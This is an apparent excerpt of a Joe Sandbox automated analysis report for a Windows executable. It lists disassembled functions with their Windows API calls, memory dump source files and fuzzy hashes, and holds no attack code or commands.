DeleteFileW.KERNELBASE(000000FF,?,?,0022977F,?,?,002295CF,?,?,?,?,?,00252641,000000FF), ref: 0022A1F1

Part of subcall function 0022BB03: _wcslen.LIBCMT ref: 0022BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0022977F,?,?,002295CF,?,?,?,?,?,00252641), ref: 0022A21F

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 952740bd68f22c0362294be26182323b8836f9a44fd814a00061e711e6c604b6
Instruction ID: f367561d887b076dcb8541eba409edaf7f9ef0c82cd14c09f00810fd1a28173e
Opcode Fuzzy Hash: 952740bd68f22c0362294be26182323b8836f9a44fd814a00061e711e6c604b6
Instruction Fuzzy Hash: 96E09231150319BBEB029FA0EC45FE9375CBB083C6F484021BD44D2090EB71DEA4DA54

Function 0023AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00252641,000000FF), ref: 0023ACB0
CoUninitialize.COMBASE(?,?,?,?,00252641,000000FF), ref: 0023ACB5

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: ffae6fe93d268b3825df00ee015ff0107b64ddbcbf138923aa8fbd27b45909ab
Instruction ID: 75089de85e8a60db50f063b37a9dc1a7f8873dff0b9d6be939b1b1bfecb563af
Opcode Fuzzy Hash: ffae6fe93d268b3825df00ee015ff0107b64ddbcbf138923aa8fbd27b45909ab
Instruction Fuzzy Hash: 3DE06572544650EFCB01DB59EC4AB45FBADFB49F20F004365F416D37A0CB74A800CA94

Function 0022A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0022A23A,?,0022755C,?,?,?,?), ref: 0022A254

Part of subcall function 0022BB03: _wcslen.LIBCMT ref: 0022BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0022A23A,?,0022755C,?,?,?,?), ref: 0022A280

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: fc257a3143f6153cb859bd5874e57c69e1e3c3afec82625f11b44e2459aa8695
Instruction ID: edbd683e6bb593c87fe08ee6d59a9cbf65347cb9cdd8110625e0742a95a45638
Opcode Fuzzy Hash: fc257a3143f6153cb859bd5874e57c69e1e3c3afec82625f11b44e2459aa8695
Instruction Fuzzy Hash: 35E09232510224ABCB11EBA4EC09BD97758AB083E2F044661FD44E31D0D770DE54CAA0

Function 0023DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0023DEEC

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

SetDlgItemTextW.USER32(00000065,?), ref: 0023DF03

Part of subcall function 0023B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0023B579
Part of subcall function 0023B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0023B58A
Part of subcall function 0023B568: IsDialogMessageW.USER32(0001042E,?), ref: 0023B59E
Part of subcall function 0023B568: TranslateMessage.USER32(?), ref: 0023B5AC
Part of subcall function 0023B568: DispatchMessageW.USER32(?), ref: 0023B5B6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 054ac2819de6e3bd308450a88809b68afaee412453f23b5cf459e9c4af8b55f9
Instruction ID: eab3c93caeab00d2c4a214fb166a82a3054fda8a6f7bbd5fc22ec2e26e51c21b
Opcode Fuzzy Hash: 054ac2819de6e3bd308450a88809b68afaee412453f23b5cf459e9c4af8b55f9
Instruction Fuzzy Hash: 89E09BB541025836DF12AB61EC0AF9E37AC5B05785F444851B204DA0F2D974D6608B61

Function 0023081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00230836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0022F2D8,Crypt32.dll,00000000,0022F35C,?,?,0022F33E,?,?,?), ref: 00230858

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: a9fdde4fbad26cec54dc22a51ab093a80e4a79ea5ac13397194faf28858dac8b
Instruction ID: c1464e20c3660bf2cc156ce7c75dd3d151c545c68e220ed3aac80cf3cd4a6e80
Opcode Fuzzy Hash: a9fdde4fbad26cec54dc22a51ab093a80e4a79ea5ac13397194faf28858dac8b
Instruction Fuzzy Hash: 4BE048B64102287BDF11AB95EC49FDA77ACEF093D2F040465B645D2044DA74DA94CFB4

Function 0023A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0023A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0023A3E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 0658127a0af8220dd54cb7f8eb0ae1bace6c9e31101626005c1d78ae826aa5a4
Instruction ID: 4f935d8b89222606260187b759632c00564db38384c1a48ccdb3575e92ef56e3
Opcode Fuzzy Hash: 0658127a0af8220dd54cb7f8eb0ae1bace6c9e31101626005c1d78ae826aa5a4
Instruction Fuzzy Hash: D9E0EDB2920218EBCB10DF55C541B99FBE8EB04765F10806AA88693241E3B4AE54DB91

Function 00242B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00242BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00242BB5

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 7c8ace883bcb90eb988bbb7a133c5a99cdc54a9072f7b81f156837d1d2372b70
Instruction ID: af0e0ac6da25f9779ec698613167a7ccdfaf8a461c5b771d014982b13bd6a141
Opcode Fuzzy Hash: 7c8ace883bcb90eb988bbb7a133c5a99cdc54a9072f7b81f156837d1d2372b70
Instruction Fuzzy Hash: 5CD022395B4322D88D1CBE7339077483B86ED52B7D7F0029AF43086CC2EE60807CA915

Function 002212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00221306
ShowWindow.USER32(00000000), ref: 0022130D

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 4eb7c7a7d5269b4419c44eae5a9aa65be7cc07462a61132ddd371d2c0065dd4a
Instruction ID: 06f6e318b748bc9188e907893d1512bd3bc1579160b76d41b0b852b4a37953b9
Opcode Fuzzy Hash: 4eb7c7a7d5269b4419c44eae5a9aa65be7cc07462a61132ddd371d2c0065dd4a
Instruction Fuzzy Hash: C5C0123A05C200BECB018BB4EC0DC2BBBA8ABA5B12F04C908B0A9C0061E238C110DB11

Function 00221A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00221A09

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: db065a1b01c8b8609de76b0a78503c6c3abea33e247c9c69386a5776221210d7
Instruction ID: 821a8e3f75fad4ea40477ef433be88dd1336f00c0fac2e02b703932aabcc8ae8
Opcode Fuzzy Hash: db065a1b01c8b8609de76b0a78503c6c3abea33e247c9c69386a5776221210d7
Instruction Fuzzy Hash: B0C1C430A10265BFDF15CFA4E494FA97BA5AF25314F0801BAEC45DB292DB309974CB61

Function 00223BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00223BBF

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 224de9886c2d0b7d424674b250741a51a3c74dad519ce0ffde9035967aa0d4b1
Instruction ID: 670770148d00e4c4e7f520fecf600a1a960412f2bb71df35c6de5e20a8ea86fe
Opcode Fuzzy Hash: 224de9886c2d0b7d424674b250741a51a3c74dad519ce0ffde9035967aa0d4b1
Instruction Fuzzy Hash: E6710571520B55AECB35DFB0D8419E7B7E9AF14300F41092EF6AB87241DA367AA8CF11

Function 00228284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00228289

Part of subcall function 002213DC: __EH_prolog.LIBCMT ref: 002213E1

Part of subcall function 0022A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0022A598

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 2e41ca28819da5d4668c13b5e0468395d46105bfd2422d134ae141cbd7169dc7
Instruction ID: d8dc5ab374cb278cbf9e90e85948932fc41b6af540769fd4a35735a9dcca904a
Opcode Fuzzy Hash: 2e41ca28819da5d4668c13b5e0468395d46105bfd2422d134ae141cbd7169dc7
Instruction Fuzzy Hash: 2B41C971925669BADB20EBE0DC55AE9B368AF10304F4404EBE54A57092EB749FD8CF10

Function 002213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002213E1

Part of subcall function 00225E37: __EH_prolog.LIBCMT ref: 00225E3C

Part of subcall function 0022CE40: __EH_prolog.LIBCMT ref: 0022CE45

Part of subcall function 0022B505: __EH_prolog.LIBCMT ref: 0022B50A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f0836ea99912ca0a5a090afe0f1d76abb54b86e29ae9b68356358d58db443a43
Instruction ID: ae8231ddae98213317093a2a734fe378b6bcbb7dc8395a2ebf840975f3937b0a
Opcode Fuzzy Hash: f0836ea99912ca0a5a090afe0f1d76abb54b86e29ae9b68356358d58db443a43
Instruction Fuzzy Hash: 23415DB0915B40AEE724DF799885AE6FBE5BF28300F51492ED5FE83282C7716664CF10

Function 002213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002213E1

Part of subcall function 00225E37: __EH_prolog.LIBCMT ref: 00225E3C

Part of subcall function 0022CE40: __EH_prolog.LIBCMT ref: 0022CE45

Part of subcall function 0022B505: __EH_prolog.LIBCMT ref: 0022B50A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 47efbd958e4d06e0bc7016ad61d07c2ee532337c01d6c21802c8c2f071e4465e
Instruction ID: 577b9e84a3c956e678437324fe2c111331eceee1c8d6328a88015939351d7f70
Opcode Fuzzy Hash: 47efbd958e4d06e0bc7016ad61d07c2ee532337c01d6c21802c8c2f071e4465e
Instruction Fuzzy Hash: F8413DB0915B40AEE724DF798885AE6FBE5BF29300F51492ED5FE83282C7716664CF10

Function 0023359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002335A3

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b3e24f5553c0af9ee4ac75bb5d5d2a92025b5487695f4f2edd534df13e64f4d7
Instruction ID: 5ef4914c2837f12e05481e7296125e988cdc9899da4158ce1f692ec47f916e06
Opcode Fuzzy Hash: b3e24f5553c0af9ee4ac75bb5d5d2a92025b5487695f4f2edd534df13e64f4d7
Instruction Fuzzy Hash: 4221F6F1E60212AFDB14DF74CC4666B766CFF19314F05053AA506EB6C1D3B09A20CAE8

Function 0023B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0023B098

Part of subcall function 002213DC: __EH_prolog.LIBCMT ref: 002213E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 767cb6ec1e222f72acd680ac76954806fa48a119eeb91aac62ab9c82b85e787c
Instruction ID: e52d25bcb09c7519f7dc9a3c4352f8d52b8f353f391577cc54c12e97cbea1c09
Opcode Fuzzy Hash: 767cb6ec1e222f72acd680ac76954806fa48a119eeb91aac62ab9c82b85e787c
Instruction Fuzzy Hash: ED31BEB1D20259EACF15DFA4D851AEEBBB4AF08300F10049EE409B7282D775AE24CF61

Function 0024AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0024ACF8

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 8d4ed177aa64941f99e9bc71538aa04b3e0dd4fff7b75e95d9e2aaab196e9862
Instruction ID: b76f9c9501d6172ff01d18dbb6ac9234ed344cd0c68f5db0bc934fa206235786
Opcode Fuzzy Hash: 8d4ed177aa64941f99e9bc71538aa04b3e0dd4fff7b75e95d9e2aaab196e9862
Instruction Fuzzy Hash: 5C110A33A602269F9F2E9F18EC8495A7395EB8436171A4121FD15AB294D730DD1187D2

Function 00229215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0022921A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 18168822d72814436fc0c4fd5f934b2165422e16fd767ba40cf4190fdb3acbd0
Instruction ID: 208a8c011a2f199546b0dc54460631b1c90ad57dae4d2715852ebcb53239ab31
Opcode Fuzzy Hash: 18168822d72814436fc0c4fd5f934b2165422e16fd767ba40cf4190fdb3acbd0
Instruction Fuzzy Hash: 3D017333920535FBCF15AFE8D8529DEB735AF88740F014225E815B7151DA348D648AA0

Function 00243C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00243C3F

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: e59b730438ae21d46e74f2537de069c3426b8145d32350fac3a3ef19ab61e4d8
Instruction ID: 9ea6a59de53607d99ac58dac42095d910fd8d67d385ad443cfa2add86a1ddde7
Opcode Fuzzy Hash: e59b730438ae21d46e74f2537de069c3426b8145d32350fac3a3ef19ab61e4d8
Instruction Fuzzy Hash: FDF0A0372202279F8F19CEA8FC44A9A77A9EF11B617104126FA15E7190DB31EA30CBD0

Function 00248E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00244286,?,0000015D,?,?,?,?,00245762,000000FF,00000000,?,?), ref: 00248E38

Memory Dump Source

